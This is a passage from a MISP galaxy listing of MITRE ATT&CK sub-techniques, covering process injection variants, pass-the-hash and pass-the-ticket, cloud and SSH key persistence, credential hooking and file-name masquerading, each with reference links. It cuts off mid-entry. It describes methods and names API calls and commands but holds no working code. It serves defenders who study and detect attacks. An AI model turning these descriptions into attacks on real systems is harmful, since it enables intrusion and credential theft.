An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities. Many utilities exist that can archive data, including 7-Zip(Citation: 7zip Homepage), WinRAR(Citation: WinRAR Homepage), and WinZip(Citation: WinZip Homepage). Most utilities include functionality to encrypt and/or compress data.

Some 3rd party utilities may be preinstalled, such as tar on Linux and macOS or zip on Windows systems.

The tag is: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001"

Table 3372. Table References
Links
https://attack.mitre.org/techniques/T1560/001
https://www.7-zip.org/
https://www.rarlab.com/
https://www.winzip.com/win/en/
https://en.wikipedia.org/wiki/List_of_file_signatures

Additional Cloud Credentials - T1098.001

Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.

Adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)

In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the <code>CreateKeyPair</code> or <code>ImportKeyPair</code> API in AWS or the <code>gcloud compute os-login ssh-keys add</code> command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)

The tag is: misp-galaxy:mitre-attack-pattern="Additional Cloud Credentials - T1098.001"

Table 3373. Table References
Links
https://attack.mitre.org/techniques/T1098/001
https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
https://www.youtube.com/watch?v=wQ1CuAPnrLM&feature=youtu.be&t=2815
https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
https://expel.io/blog/finding-evil-in-aws/
https://expel.io/blog/behind-the-scenes-expel-soc-alert-aws/

Compile After Delivery - T1027.004

Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)

Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)

The tag is: misp-galaxy:mitre-attack-pattern="Compile After Delivery - T1027.004"

Table 3374. Table References
Links
https://attack.mitre.org/techniques/T1027/004
https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/

Remote Data Staging - T1074.002

Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.

In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)

By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.

The tag is: misp-galaxy:mitre-attack-pattern="Remote Data Staging - T1074.002"

Table 3375. Table References
Links
https://attack.mitre.org/techniques/T1074/002
https://content.fireeye.com/m-trends/rpt-m-trends-2020

Portable Executable Injection - T1055.002

Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process.

PE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as <code>VirtualAllocEx</code> and <code>WriteProcessMemory</code>, then invoked with <code>CreateRemoteThread</code> or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. (Citation: Elastic Process Injection July 2017)

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Portable Executable Injection - T1055.002"

Table 3376. Table References
Links
https://attack.mitre.org/techniques/T1055/002
https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

Pass the Hash - T1550.002

Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user’s cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.

When performing PtH, valid password hashes for the account being used are captured using a [Credential Access](https://attack.mitre.org/tactics/TA0006) technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.

Adversaries may also use stolen password hashes to "overpass the hash." Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.(Citation: Stealthbits Overpass-the-Hash)

The tag is: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002"

Table 3377. Table References
Links
https://attack.mitre.org/techniques/T1550/002
https://capec.mitre.org/data/definitions/644.html
https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/

Archive via Library - T1560.002

An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.

Some archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.

The tag is: misp-galaxy:mitre-attack-pattern="Archive via Library - T1560.002"

Table 3378. Table References
Links
https://attack.mitre.org/techniques/T1560/002
https://pypi.org/project/rarfile/
https://libzip.org/
https://github.com/madler/zlib
https://en.wikipedia.org/wiki/List_of_file_signatures

GUI Input Capture - T1056.002

Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)).

Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems attackers may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs)

The tag is: misp-galaxy:mitre-attack-pattern="GUI Input Capture - T1056.002"

Table 3379. Table References
Links
https://attack.mitre.org/techniques/T1056/002
https://capec.mitre.org/data/definitions/659.html
https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html
https://logrhythm.com/blog/do-you-trust-your-computer/
https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/
https://embracethered.com/blog/posts/2021/spoofing-credential-dialogs/
https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/

Rename System Utilities - T1036.003

Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename <code>rundll32.exe</code>). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)

The tag is: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003"

Table 3380. Table References
Links
https://attack.mitre.org/techniques/T1036/003
https://lolbas-project.github.io/
http://pages.endgame.com/rs/627-YBU-612/images/EndgameJournal_The%20Masquerade%20Ball_Pages_R2.pdf
https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163418/CozyDuke.pdf
https://twitter.com/ItsReallyNick/status/1055321652777619457

Network Logon Script - T1037.003

Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects.(Citation: Petri Logon Script AD) These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems.

Adversaries may use these scripts to maintain persistence on a network. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.

The tag is: misp-galaxy:mitre-attack-pattern="Network Logon Script - T1037.003"

Table 3381. Table References
Links
https://attack.mitre.org/techniques/T1037/003
https://www.petri.com/setting-up-logon-script-through-active-directory-users-computers-windows-server-2008

Thread Execution Hijacking - T1055.003

Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process.

Thread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as <code>OpenThread</code>. At this point the process can be suspended then written to, realigned to the injected code, and resumed via <code>SuspendThread </code>, <code>VirtualAllocEx</code>, <code>WriteProcessMemory</code>, <code>SetThreadContext</code>, then <code>ResumeThread</code> respectively.(Citation: Elastic Process Injection July 2017)

This is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) but targets an existing process rather than creating a process in a suspended state.

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Thread Execution Hijacking - T1055.003"

Table 3382. Table References
Links
https://attack.mitre.org/techniques/T1055/003
https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

Pass the Ticket - T1550.003

Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account’s password. Kerberos authentication can be used as the first step to lateral movement to a remote system.

When preforming PtT, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user’s service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket)

A [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks)

A [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014)

Adversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, "overpassing the hash" involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password hash to create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash)

The tag is: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1550.003"

Table 3383. Table References
Links
https://attack.mitre.org/techniques/T1550/003
https://capec.mitre.org/data/definitions/645.html
https://adsecurity.org/?p=556
http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf

Web Portal Capture - T1056.003

Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.

This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)

The tag is: misp-galaxy:mitre-attack-pattern="Web Portal Capture - T1056.003"

Table 3384. Table References
Links
https://attack.mitre.org/techniques/T1056/003
https://capec.mitre.org/data/definitions/569.html
https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/

Container Orchestration Job - T1053.007

Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.

In Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in various nodes within a cluster.(Citation: Threat Matrix for Kubernetes)

The tag is: misp-galaxy:mitre-attack-pattern="Container Orchestration Job - T1053.007"

Table 3385. Table References
Links
https://attack.mitre.org/techniques/T1053/007
https://kubernetes.io/docs/concepts/workloads/controllers/job/
https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/
https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/

Windows Command Shell - T1059.003

Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)

Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.

The tag is: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003"

Table 3386. Table References
Links
https://attack.mitre.org/techniques/T1059/003
https://docs.microsoft.com/en-us/windows/terminal/tutorials/ssh

Network Trust Dependencies - T1590.003

Adversaries may gather information about the victim’s network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: Pentesting AD Forests) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: misp-galaxy:mitre-attack-pattern="Network Trust Dependencies - T1590.003"

Table 3387. Table References
Links
https://attack.mitre.org/techniques/T1590/003
https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019

Space after Filename - T1036.006

For example, if there is a Mach-O executable file called <code>evil.bin</code>, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to <code>evil.txt</code>, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to <code>evil.txt </code> (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).

Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.

The tag is: misp-galaxy:mitre-attack-pattern="Space after Filename - T1036.006"

Table 3388. Table References
Links
https://attack.mitre.org/techniques/T1036/006
https://capec.mitre.org/data/definitions/649.html
https://arstechnica.com/security/2016/07/after-hiatus-in-the-wild-mac-backdoors-are-suddenly-back/

Double File Extension - T1036.007

Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: <code>File.txt.exe</code> may render in some views as just <code>File.txt</code>). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system’s policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension)

Adversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain [Initial Access](https://attack.mitre.org/tactics/TA0001) into a user’s system via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) then [User Execution](https://attack.mitre.org/techniques/T1204). For example, an executable file attachment named <code>Evil.txt.exe</code> may display as <code>Evil.txt</code> to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.(Citation: SOCPrime DoubleExtension)

Common file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.

The tag is: misp-galaxy:mitre-attack-pattern="Double File Extension - T1036.007"

Table 3389. Table References
Links
https://attack.mitre.org/techniques/T1036/007
https://www.pcmag.com/encyclopedia/term/double-extension
https://socprime.com/blog/rule-of-the-week-possible-malicious-file-double-extension/
https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/

Install Digital Certificate - T1608.003

Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications between systems. Digital certificates include information about the key, information about its owner’s identity, and the digital signature of an entity that has verified the certificate’s contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate securely with its owner. Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable encrypted communication with it.(Citation: DigiCert Install SSL Cert)

Adversaries may install SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or lending credibility to a credential harvesting site. Installation of digital certificates may take place for a number of server types, including web servers and email servers.

Adversaries can obtain digital certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) or create self-signed certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1587/003)). Digital certificates can then be installed on adversary controlled infrastructure that may have been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).

The tag is: misp-galaxy:mitre-attack-pattern="Install Digital Certificate - T1608.003"

Table 3390. Table References
Links
https://attack.mitre.org/techniques/T1608/003
https://www.digicert.com/kb/ssl-certificate-installation.htm
https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html

Asynchronous Procedure Call - T1055.004

Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process.

APC injection is commonly performed by attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process’s thread. Queued APC functions are executed when the thread enters an alterable state.(Citation: Microsoft APC) A handle to an existing victim process is first created with native Windows API calls such as <code>OpenThread</code>. At this point <code>QueueUserAPC</code> can be used to invoke a function (such as <code>LoadLibrayA</code> pointing to a malicious DLL).

A variation of APC injection, dubbed "Early Bird injection", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.(Citation: Microsoft Atom Table)

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Asynchronous Procedure Call - T1055.004"

Table 3391. Table References
Links
https://attack.mitre.org/techniques/T1055/004
https://msdn.microsoft.com/library/windows/desktop/ms681951.aspx
https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/
https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows
https://msdn.microsoft.com/library/windows/desktop/ms649053.aspx
https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

Web Session Cookie - T1550.004

Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)

Authentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) or [Web Cookies](https://attack.mitre.org/techniques/T1606/001), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.

There have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Web Session Cookie - T1550.004"

Table 3392. Table References
Links
https://attack.mitre.org/techniques/T1550/004
https://capec.mitre.org/data/definitions/60.html
https://wunderwuzzi23.github.io/blog/passthecookie.html
https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/

Credential API Hooking - T1056.004

Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:

Hooks procedures, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
Import address table (IAT) hooking, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
Inline hooking, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Credential API Hooking - T1056.004"

Table 3393. Table References
Links
https://attack.mitre.org/techniques/T1056/004
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
https://www.exploit-db.com/docs/17802.pdf
https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
https://github.com/prekageo/winhook
https://github.com/jay/gethooks
https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
http://www.gmer.net/
https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis

SSH Authorized Keys - T1098.004

Adversaries may modify the SSH <code>authorized_keys</code> file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The <code>authorized_keys</code> file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user’s home directory under <code><user-home>/.ssh/authorized_keys</code>.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under <code>/etc/ssh/sshd_config</code>.

Adversaries may modify SSH <code>authorized_keys</code> files directly with scripts or shell commands to add their own adversary-supplied public keys. This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse) (Citation: Cybereason Linux Exim Worm)

The tag is: misp-galaxy:mitre-attack-pattern="SSH Authorized Keys - T1098.004"

Table 3394. Table References
Links
https://attack.mitre.org/techniques/T1098/004
https://www.ssh.com/ssh/authorized_keys/
https://www.venafi.com/blog/growing-abuse-ssh-keys-commodity-malware-campaigns-now-equipped-ssh-capabilities
https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability

Thread Local Storage - T1055.005

Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process.

TLS callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code’s legitimate entry point. TLS callbacks are normally used by the OS to setup and/or cleanup data used by threads. Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process’ memory space using other [Process Injection](https://attack.mitre.org/techniques/T1055) techniques such as [Process Hollowing](https://attack.mitre.org/techniques/T1055/012).(Citation: FireEye TLS Nov 2017)

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Thread Local Storage - T1055.005"

Table 3395. Table References
Links
https://attack.mitre.org/techniques/T1055/005
https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html
https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

Ptrace System Calls - T1055.008

Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process.

Ptrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: <code>malloc</code>) then invoking that memory with <code>PTRACE_SETREGS</code> to set the register containing the next instruction to execute. Ptrace system call injection can also be done with <code>PTRACE_POKETEXT</code>/<code>PTRACE_POKEDATA</code>, which copy data to a specific address in the target processes’ memory (ex: the current address of the next instruction). (Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018)

Ptrace system call injection may not be possible targeting processes that are non-child processes and/or have higher-privileges.(Citation: BH Linux Inject)

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Ptrace System Calls - T1055.008"

Table 3396. Table References
Links
https://attack.mitre.org/techniques/T1055/008
http://man7.org/linux/man-pages/man2/ptrace.2.html
https://medium.com/@jain.sm/code-injection-in-running-process-using-ptrace-d3ea7191a4be
https://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdf
https://www.gnu.org/software/acct/
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html

Network Security Appliances - T1590.006

Adversaries may gather information about the victim’s network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.

